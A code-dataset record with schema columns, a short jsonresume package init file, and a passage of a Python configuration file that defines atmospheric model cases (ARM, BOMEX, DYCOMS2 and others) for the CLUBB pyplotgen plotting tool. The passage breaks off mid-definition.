hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
a73131170f5bdfaf1161caf237d671d9dbf5663d
253
py
Python
jsonresume/__init__.py
kelvintaywl/jsonresume-validator
73ac162cb30ca70699c942def629188f7dfd4d3c
[ "MIT" ]
42
2016-06-03T18:17:24.000Z
2021-12-09T04:13:14.000Z
jsonresume/__init__.py
kelvintaywl/jsonresume-validator
73ac162cb30ca70699c942def629188f7dfd4d3c
[ "MIT" ]
3
2016-04-27T12:32:41.000Z
2020-09-29T16:43:35.000Z
jsonresume/__init__.py
kelvintaywl/jsonresume-validator
73ac162cb30ca70699c942def629188f7dfd4d3c
[ "MIT" ]
9
2016-05-08T15:31:53.000Z
2021-04-28T09:17:47.000Z
# -*- coding: utf-8 -*- """ JSON Resume Validator ~~~~~~ JSON Resume Validator helps validate python dictionaries to ensure they are valid representation of a JSON Resume. """ from jsonresume.resume import Resume __all__ = ['Resume']
19.461538
63
0.675889
30
253
5.566667
0.733333
0.179641
0.227545
0
0
0
0
0
0
0
0
0.005025
0.213439
253
12
64
21.083333
0.834171
0.660079
0
0
0
0
0.096774
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
a739bd10614848db1a73028a77c6c885008e1463
63,679
py
Python
postprocessing/pyplotgen/config/Case_definitions.py
larson-group/clubb_release
b4d671e3e238dbe00752c0dead6a0d4f9897350a
[ "Intel", "Unlicense", "NetCDF" ]
null
null
null
postprocessing/pyplotgen/config/Case_definitions.py
larson-group/clubb_release
b4d671e3e238dbe00752c0dead6a0d4f9897350a
[ "Intel", "Unlicense", "NetCDF" ]
null
null
null
postprocessing/pyplotgen/config/Case_definitions.py
larson-group/clubb_release
b4d671e3e238dbe00752c0dead6a0d4f9897350a
[ "Intel", "Unlicense", "NetCDF" ]
1
2022-01-28T22:22:04.000Z
2022-01-28T22:22:04.000Z
""" :author: Nicolas Strike :date: Early 2019 This file is mostly a definition of Cases. Each case is defined in the following format using python dictionaries (values surrounded with < > must have the < > removed to be valid). .. code-block:: python :linenos: CASENAME = {'name': 'casename', 'description': "", 'start_time': <numeric value>, 'end_time': <numeric value>, 'height_min_value': <numeric value>, 'height_max_value': <numeric value>, 'blacklisted_vars': ['list', 'of', 'variable', 'names', 'to', 'exclude', 'from', 'plotting'], 'sam_benchmark_file': <path to sam file>", 'clubb_file': {'zm': <path to file>, 'zt': <path to file>, 'sfc': <path to file>}, 'coamps_benchmark_file': {'sm': <path to file>, 'sw': <path to file>}, 'clubb_r408_benchmark_file': {'zm': <path to file>, 'zt': <path to file>, 'sfc': <path to file>}, 'clubb_hoc_benchmark_file': {'zm': <path to file>', 'zt': <path to file>', 'sfc': <path to file>}, 'e3sm_file': <path to file>, 'cam_file': <path to file>, 'sam_file': <path to file>, 'wrf_file': {'zm': <path to file>, 'zt': <path to file>, 'sfc': <path to file>}, 'var_groups': [VariableGroupBase, <other variable groups to plot>]} **Important note**: When creating a new case, add it to the CASES_TO_PLOT list at the bottom of the file. Additionally, please add it in alphabetical order. **Case Definition values explained**: *name*: must be the same as the filename without the extention. E.g. to use lba_zt.nc and lba_zm.nc the case's name must be 'lba'. Extensions are determined by the last instance of _ *start_time*: An integer value representing which timestep to begin the time-averaging interval. Valid options are from 1 -> list minute value. Give in terms of clubb minutes. *end_time*: An integer value representing which timestep to end the time-averaging interval. Valid options are from 1 -> list minute value. Give in terms of clubb minutes. 
Also used to determine where to stop timeseries plots *height_min_value*: The elevation to begin height plots at *height_max_value*: The elevation to end height plots at *blacklisted_vars*: List of variables to avoid plotting for this case. Names must use the clubb-name version *<model name>_file*: The path(s) to nc files for the given model. (please use the <model name>_OUTPUT_ROOT variables as the beginning of the path). *var_groups*: These are the groups of variables to be plotted for the given case. var_groups is defined as a list of python class names, where the classes use the naming scheme VariableGroup____.py and define a variable group. An example would be: 'var_groups': [VariableGroupBase, VariableGroupWs]. The variables inside a VariableGroup can be found in the file with the same name, i.e. config/VariableGroupBase.py. An example would be thlm in VariableGroupBase. """ import os from config.VariableGroupBase import VariableGroupBase from config.VariableGroupCorrelations import VariableGroupCorrelations from config.VariableGroupIceMP import VariableGroupIceMP from config.VariableGroupKKMP import VariableGroupKKMP from config.VariableGroupLiquidMP import VariableGroupLiquidMP from config.VariableGroupSamProfiles import VariableGroupSamProfiles from config.VariableGroupScalars import VariableGroupScalars from config.VariableGroupWs import VariableGroupWs from config.VariableGroupTaus import VariableGroupTaus from config.VariableGroupNondimMoments import VariableGroupNondimMoments from config.VariableGroupNormalizedVariations import VariableGroupNormalizedVariations # --------------------------- BENCHMARK_OUTPUT_ROOT = "/home/pub/les_and_clubb_benchmark_runs/" if not os.path.isdir(BENCHMARK_OUTPUT_ROOT) and \ not os.path.islink(BENCHMARK_OUTPUT_ROOT): print("Benchmark output was not found in " + BENCHMARK_OUTPUT_ROOT + ".\n\tChecking local location: " + os.path.dirname(os.path.realpath(__file__)) + "/../les_and_clubb_benchmark_runs/") BENCHMARK_OUTPUT_ROOT 
= os.path.dirname(os.path.realpath(__file__)) + "/../les_and_clubb_benchmark_runs/" SAM_BENCHMARK_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "sam_benchmark_runs" COAMPS_BENCHMARK_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "les_runs" WRF_LASSO_BENCHMARK_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "wrf_lasso_runs" ARCHIVED_CLUBB_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "archived_clubb_runs" R408_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "" HOC_OUTPUT_ROOT = BENCHMARK_OUTPUT_ROOT + "HOC_20051217" # This folder is passed in as a command line parameter # It is not capitalized because it is not intended to # be final, i.e. is changed depending on the cmd line arg e3sm_output_root = "" sam_output_root = "" wrf_output_root = "" cam_output_root = "" clubb_output_root = "" # --------------------------- # These are all the names that represent the height variable within different models HEIGHT_VAR_NAMES = ['z', 'Z3', 'altitude', 'lev', 'CSP_Zm', 'CSP_Z8Wm'] # CSP_* added for WRF-LASSO cases TIME_VAR_NAMES = ['time', 'XTIME'] """ To plot only a subset of cases, reguardless of what output exists in the clubb folder, uncomment the last line of this file and fill that array with the cases you'd like to plot. This overwrites the CASES_TO_PLOT variable such that pyplotgen will only know about cases in that list and ignore all others. The name must match the python variable name below (all caps). For example, to plot only bomex and fire: CASES_TO_PLOT = [BOMEX, FIRE] """ ARM = {'name': 'arm', 'description': "Output may differ from plotgen in some models (e.g. 
WRF) due to a difference in the time " "averaging interval.", 'start_time': 481, 'end_time': 540, 'height_min_value': 0, 'height_max_value': 3500, 'blacklisted_vars': ['radht'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/ARM_96x96x110/GCSSARM_96x96x110_67m_40m_1s.nc"}, 'clubb_file': {'zm': clubb_output_root + '/arm_zm.nc', 'zt': clubb_output_root + '/arm_zt.nc', 'sfc': clubb_output_root + '/arm_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/arm_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/arm_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/arm_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/arm_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/arm_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/arm_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/arm_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/arm_sfc.nc'}, 'e3sm_file': { 'e3sm': e3sm_output_root + "/arm.nc"}, 'cam_file': None, 'sam_file': {'sam': sam_output_root + "/GCSSARM_96x96x110_67m_40m_1s.nc"}, 'wrf_file': {'zm': wrf_output_root + "/arm_zm_wrf.nc", 'zt': wrf_output_root + "/arm_zt_wrf.nc", 'sfc': wrf_output_root + "/arm_sfc_wrf.nc" }, 'var_groups': [VariableGroupBase, VariableGroupWs]} ARM_97 = {'name': 'arm_97', 'description': "", 'start_time': 4321, 'end_time': 5580, 'height_min_value': 0, 'height_max_value': 18000, 'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'thlp3', 'rtpthvp', 'thlpthvp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/ARM97_r1315_128x128x128_1km_Morrison/ARM9707.nc"}, 'clubb_file': {'zm': clubb_output_root + '/arm_97_zm.nc', 'zt': clubb_output_root + '/arm_97_zt.nc', 'sfc': clubb_output_root + '/arm_97_sfc.nc', 'subcolumns': clubb_output_root + '/arm_97_nl_lh_sample_points_2D.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 
'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': {'sam': sam_output_root + "/ARM9707_SAM_CLUBB.nc"}, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupIceMP]} ASTEX_A209 = {'name': 'astex_a209', 'description': "", 'start_time': 2340, 'end_time': 2400, 'height_min_value': 0, 'height_max_value': 6000, 'blacklisted_vars': [], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/astex_a209_zm.nc', 'zt': clubb_output_root + '/astex_a209_zt.nc', 'sfc': clubb_output_root + '/astex_a209_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations, VariableGroupKKMP]} ATEX = {'name': 'atex', 'description': "", 'start_time': 421, 'end_time': 480, 'height_min_value': 0, 'height_max_value': 2500, 'blacklisted_vars': [], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/atex_zm.nc', 'zt': clubb_output_root + '/atex_zt.nc', 'sfc': clubb_output_root + '/atex_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/atex_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/atex_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/atex_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/atex_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/atex_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/atex_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/atex_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/atex_sfc.nc'}, 'e3sm_file': None, 'cam_file': {'cam': cam_output_root + "/atex_cam.nc"}, 'sam_file': None, 'wrf_file': {'zm': wrf_output_root + "/atex_zm_wrf.nc", 'zt': wrf_output_root + "/atex_zt_wrf.nc", 'sfc': wrf_output_root 
+ "/atex_sfc_wrf.nc" }, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupIceMP]} BOMEX = {'name': 'bomex', 'description': "", 'start_time': 181, 'end_time': 360, 'height_min_value': 0, 'height_max_value': 2500, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/BOMEX_64x64x75/BOMEX_64x64x75_100m_40m_1s.nc"}, 'clubb_file': {'zm': clubb_output_root + '/bomex_zm.nc', 'zt': clubb_output_root + '/bomex_zt.nc', 'sfc': clubb_output_root + '/bomex_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/bomex_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/bomex_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/bomex_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/bomex_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/bomex_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/bomex_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/bomex_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/bomex_sfc.nc'}, 'e3sm_file': { 'e3sm': e3sm_output_root + '/bomex.nc'}, 'cam_file': None, 'sam_file': {'sam': sam_output_root + "/BOMEX_SAM_CLUBB.nc"}, 'wrf_file': {'zm': wrf_output_root + '/bomex_zm_wrf.nc', 'zt': wrf_output_root + '/bomex_zt_wrf.nc', 'sfc': wrf_output_root + '/bomex_sfc_wrf.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} CGILS_S6 = {'name': 'cgils_s6', 'description': "", 'start_time': 12960, 'end_time': 14400, 'height_min_value': 0, 'height_max_value': 5950, 'blacklisted_vars': ['Ngm', 'rgm', 'Skrt_zt', 'Skthl_zt', 'thlp3', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/SAM6.6/CLOUD_FEEDBACK_s6/ctl_s6_96x96x128_100m_DRZ_N100_tqndg.nc"}, 'clubb_file': {'zm': clubb_output_root + '/cgils_s6_zm.nc', 'zt': clubb_output_root + '/cgils_s6_zt.nc', 'sfc': clubb_output_root + '/cgils_s6_sfc.nc'}, 'coamps_benchmark_file': 
None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} CGILS_S11 = {'name': 'cgils_s11', 'description': "", 'start_time': 12960, 'end_time': 14400, 'height_min_value': 0, 'height_max_value': 5950, 'blacklisted_vars': ['Ngm', 'rgm', 'Skthl_zt', 'Skrt_zt', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/SAM6.6/CLOUD_FEEDBACK_s11/ctl_s11_96x96x320_50m_DRZ_N100_ref.nc"}, 'clubb_file': {'zm': clubb_output_root + '/cgils_s11_zm.nc', 'zt': clubb_output_root + '/cgils_s11_zt.nc', 'sfc': clubb_output_root + '/cgils_s11_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} CGILS_S12 = {'name': 'cgils_s12', 'description': "", 'start_time': 12960, 'end_time': 14400, 'height_min_value': 0, 'height_max_value': 5950, 'blacklisted_vars': ['Ngm', 'rgm', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp', 'wprrp', 'wpNrp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/SAM6.6/CLOUD_FEEDBACK_s12/ctl_s12_96x96x192_25m_DRZ_N100_fixnudge.nc"}, 'clubb_file': {'zm': clubb_output_root + '/cgils_s12_zm.nc', 'zt': clubb_output_root + '/cgils_s12_zt.nc', 'sfc': clubb_output_root + '/cgils_s12_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} CLEX9_NOV02 = {'name': 'clex9_nov02', 'description': "", 'start_time': 181, 'end_time': 240, 'height_min_value': 
4000, 'height_max_value': 6072, 'blacklisted_vars': ['Ngm'], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/clex9_nov02_zm.nc', 'zt': clubb_output_root + '/clex9_nov02_zt.nc', 'sfc': clubb_output_root + '/clex9_nov02_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_nov02_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_nov02_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} CLEX9_OCT14 = {'name': 'clex9_oct14', 'description': "", 'start_time': 181, 'end_time': 240, 'height_min_value': 2230, 'height_max_value': 6688, 'blacklisted_vars': ['Ngm'], 'sam_benchmark_file': None, 'clubb_file': {'zm': clubb_output_root + '/clex9_oct14_zm.nc', 'zt': clubb_output_root + '/clex9_oct14_zt.nc', 'sfc': clubb_output_root + '/clex9_oct14_sfc.nc'}, 'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_oct14_coamps_sm.nc", 'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_oct14_coamps_sw.nc"}, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]} DYCOMS2_RF01 = {'name': 'dycoms2_rf01', 'description': "", 'start_time': 181, 'end_time': 240, 'height_min_value': 0, 'height_max_value': 1200, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/DYCOMS_RF01_96x96x320/DYCOMS_RF01_96x96x320.nc"}, 'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf01_zm.nc', 'zt': clubb_output_root + '/dycoms2_rf01_zt.nc', 'sfc': clubb_output_root + '/dycoms2_rf01_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': 
R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf01_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf01_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf01_sfc.nc'}, 'e3sm_file': { 'e3sm': e3sm_output_root + "/dycoms2_rf01.nc"}, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs]} DYCOMS2_RF01_FIXED_SST = {'name': 'dycoms2_rf01_fixed_sst', 'description': "Copied from plotgen: Ran with a 5 min timestep and a 48-level grid", 'start_time': 2520, 'end_time': 2700, 'height_min_value': 0, 'height_max_value': 1200, 'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/SAM6.6/DYCOMS_RF01_fixed_sst/DYCOMS_RF01_96x96x320_LES_fixed_sst.nc"}, 'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf01_fixed_sst_zm.nc', 'zt': clubb_output_root + '/dycoms2_rf01_fixed_sst_zt.nc', 'sfc': clubb_output_root + '/dycoms2_rf01_fixed_sst_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase]} DYCOMS2_RF02_DO = {'name': 'dycoms2_rf02_do', 'description': "", 'start_time': 301, 'end_time': 360, 'height_min_value': 0, 'height_max_value': 1200, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/DYCOMS_RF02_128x128x96_dr_nosed/DYCOMS_RF02_128x128x96_dr_nosed.nc"}, 'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_do_zm.nc', 'zt': clubb_output_root + '/dycoms2_rf02_do_zt.nc', 'sfc': clubb_output_root + '/dycoms2_rf02_do_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_sfc.nc'}, 'e3sm_file': None, 'cam_file': None, 'sam_file': {'sam': sam_output_root + "/DYCOMS_RF02_SAM_CLUBB.nc"}, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations, VariableGroupKKMP]} DYCOMS2_RF02_DS = {'name': 'dycoms2_rf02_ds', 'description': "", 'start_time': 301, 'end_time': 360, 'height_min_value': 0, 'height_max_value': 1200, 'blacklisted_vars': [], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/DYCOMS_RF02_128x128x96_dr_sed/DYCOMS_RF02_128x128x96_dr_sed.nc"}, 'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_ds_zm.nc', 'zt': clubb_output_root + '/dycoms2_rf02_ds_zt.nc', 'sfc': clubb_output_root + '/dycoms2_rf02_ds_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_sfc.nc'}, 'e3sm_file': {'e3sm': e3sm_output_root + "/dycoms2_rf02_ds.nc"}, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations, VariableGroupKKMP]} DYCOMS2_RF02_ND = {'name': 'dycoms2_rf02_nd', 'description': "Copied from plotgen: ** Generated by doing a restart run after 7200 seconds. Note: " "t = 0 corresponds to start time of the restart run, not the original run. 
** ", 'start_time': 301, 'end_time': 360, 'height_min_value': 0, 'height_max_value': 1200, 'blacklisted_vars': ['wprrp', 'wpNrp', 'corr_w_rr_1', 'corr_w_Nr_1'], 'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT + "/JULY_2017/DYCOMS_RF02_128x128x96_nodr_nosed/DYCOMS_RF02_128x128x96_nodr_nosed.nc"}, 'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_nd_zm.nc', 'zt': clubb_output_root + '/dycoms2_rf02_nd_zt.nc', 'sfc': clubb_output_root + '/dycoms2_rf02_nd_sfc.nc'}, 'coamps_benchmark_file': None, 'wrf_benchmark_file': None, 'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_zm.nc', 'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_zt.nc', 'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_sfc.nc'}, 'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_zm.nc', 'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_zt.nc', 'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_sfc.nc'}, 'e3sm_file': None, 'cam_file': None, 'sam_file': None, 'wrf_file': None, 'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupKKMP]} DYCOMS2_RF02_DS_RESTART = 